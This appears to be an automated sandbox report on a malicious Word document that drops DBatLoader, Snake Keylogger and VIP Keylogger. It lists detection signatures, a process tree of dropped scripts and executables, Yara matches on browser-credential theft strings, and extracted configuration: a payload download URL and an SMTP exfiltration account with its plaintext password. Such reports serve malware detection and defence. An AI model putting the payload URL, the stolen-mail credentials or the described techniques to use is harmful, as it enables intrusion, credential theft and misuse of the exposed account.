Edit tour

Windows Analysis Report
PI ITS15235.doc

Overview

General Information

Sample name:	PI ITS15235.doc
Analysis ID:	1590510
MD5:	c8e60db8174345c243187675d4c760de
SHA1:	34bdd0903708f1ab747cbb45a6a292517e1df83e
SHA256:	94519fee9d47fd0262d1dd50e0bf20ea7cb0962b3a1e1de217c5f462b0633fab
Tags:	docuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process drops PE file

Office process queries suspicious COM object (likely to drop second stage)

PE file contains section with special chars

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7688 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

brightness.exe (PID: 8092 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 8D3E16CB3CE3940E87A322FBEEAB419F)

cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2492 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

npratlsN.pif (PID: 4544 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Nsltarpn.PIF (PID: 3548 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: 8D3E16CB3CE3940E87A322FBEEAB419F)

npratlsN.pif (PID: 3592 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Nsltarpn.PIF (PID: 2916 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: 8D3E16CB3CE3940E87A322FBEEAB419F)

npratlsN.pif (PID: 6036 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://amazonenviro.com/admin/245_Nsltarpncon"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000001.1859265751.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3432289694.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e5e1:$a1: get_encryptedPassword 0x3e5b5:$a2: get_encryptedUsername 0x3e679:$a3: get_timePasswordChanged 0x3e591:$a4: get_passwordField 0x3e5f7:$a5: set_encryptedPassword 0x3e3c4:$a7: get_logins 0x39a3f:$a10: KeyLoggerEventArgs 0x39a0e:$a11: KeyLoggerEventArgsEventHandler 0x3e498:$a13: _encryptedPassword
0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
00000010.00000002.3432404801.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.1892098003.000000007FD70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1863488781.0000000002274000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3eed9:$a1: get_encryptedPassword 0x3eead:$a2: get_encryptedUsername 0x3ef71:$a3: get_timePasswordChanged 0x3ee89:$a4: get_passwordField 0x3eeef:$a5: set_encryptedPassword 0x3ecbc:$a7: get_logins 0x3a337:$a10: KeyLoggerEventArgs 0x3a306:$a11: KeyLoggerEventArgsEventHandler 0x3ed90:$a13: _encryptedPassword
00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
